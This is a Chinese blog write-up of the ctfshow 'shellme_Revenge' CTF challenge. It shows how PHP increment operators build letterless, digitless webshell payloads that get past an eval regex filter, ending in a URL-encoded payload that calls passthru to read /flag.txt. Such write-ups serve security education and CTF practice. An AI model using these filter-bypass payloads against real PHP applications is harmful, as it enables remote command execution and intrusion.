ctfshow 吃瓜杯 shellme_Revenge_ctfshow shellme-优快云博客

本文链接：https://blog.youkuaiyun.com/weixin_46270220/article/details/119740439

本文介绍了在CTF比赛中如何利用PHP的自增运算符构造特殊的字符串，绕过过滤限制，实现命令执行。通过分析题目源码，找到可以使用的字符并构造payload，最终使用passthru函数读取flag。文章详细展示了payload的构建过程，揭示了字符串操作在Web安全中的巧妙应用。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

文章目录

前言

在这次ctfshow的吃瓜杯比赛中，出现了一道利用自增运算符来造成命令执行的题目shellme_Revenge，以前只学过异或、或和取反的方法，因此这次来学习一波

主要是参考p神的文章一些不包含数字和字母的webshell

自增

在php中，当把字符串和数组连接在一起时，最终返回的值是Array

<?php
echo ''.[];

请添加图片描述
且php中a++ => b，b++ =>c，那么只要取Array中的第一个字母A和第四个字母a，就可以得到A-Z和a-z的所有字母组合。

<?php
$_=[];
$_=@"$_"; // $_='Array';
$_=$_['!'=='@']; // $_=$_[0];
$___=$_; // A
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;
$___.=$__; // S
$___.=$__; // S
$__=$_;
$__++;$__++;$__++;$__++; // E 
$___.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // R
$___.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // T
$___.=$__;

$____='_';
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // P
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // O
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // S
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // T
$____.=$__;

$_=$$____;
$___($_[_]);  // ASSERT($_POST[_]);

题目wp

在cookie中看到有?looklook，传值后出现源码

<?php
error_reporting(0);
if ($_GET['looklook']){
    highlight_file(__FILE__);
}else{
    setcookie("hint", "?looklook", time()+3600);
}
if (isset($_POST['ctf_show'])) {
    $ctfshow = $_POST['ctf_show'];
    if (is_string($ctfshow) || strlen($ctfshow) <= 107) {
        if (!preg_match("/[!@#%^&*:'\"|`a-zA-BD-Z~\\\\]|[4-9]/",$ctfshow)){
            eval($ctfshow);
        }else{
            echo("fucccc hacker!!");
        }
    }
} else {

    phpinfo();
}
?>

可以看到字母和数字中没被过滤的只剩C和0-3，就用这几个来构造payload

<?php
$_=C;
$_++; //D
$C=++$_; //E
$_++; //F
$C_=++$_; //G
$_=(C/C.C){0}; //N
$_++; //O
$_++; //P
$_++; //Q
$_++; //R
$_++; //S
$_=_.$C_.$C.++$_; //_GET
($$_{1})($$_{2}); //($_GET{1})($_GET{2})

在diaabled_function中，可以看到
请添加图片描述
过滤了system exec shell_exec，因此执行系统命令的函数需要选择passthru（比赛的时候漏看了一个字母，把fpassthru看成passthru了…）

payload:

?looklook=1&1=passthru&2=cat /flag.txt

ctf_show=%24_%3DC%3B%24_%2B%2B%3B%24C%3D%2B%2B%24_%3B%24_%2B%2B%3B%24C_%3D%2B%2B%24_%3B%24_%3D(C%2FC.C)%7B0%7D%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%3D_.%24C_.%24C.%2B%2B%24_%3B(%24%24_%7B1%7D)(%24%24_%7B2%7D)%3B%20